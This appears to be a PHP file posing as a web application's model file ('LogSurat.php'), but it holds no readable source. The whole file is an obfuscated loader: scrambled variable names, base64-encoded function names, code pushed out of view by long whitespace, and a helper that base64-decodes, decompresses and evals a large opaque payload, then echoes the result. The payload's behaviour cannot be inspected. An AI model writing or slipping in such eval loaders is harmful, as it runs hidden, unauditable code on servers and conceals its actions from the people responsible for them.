<?php 
        $__='printf';$_='Loading app/Models/LogSurat.php';
        































































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='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';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      






























































































































































































                                                                                                                                                                                                                     $________;
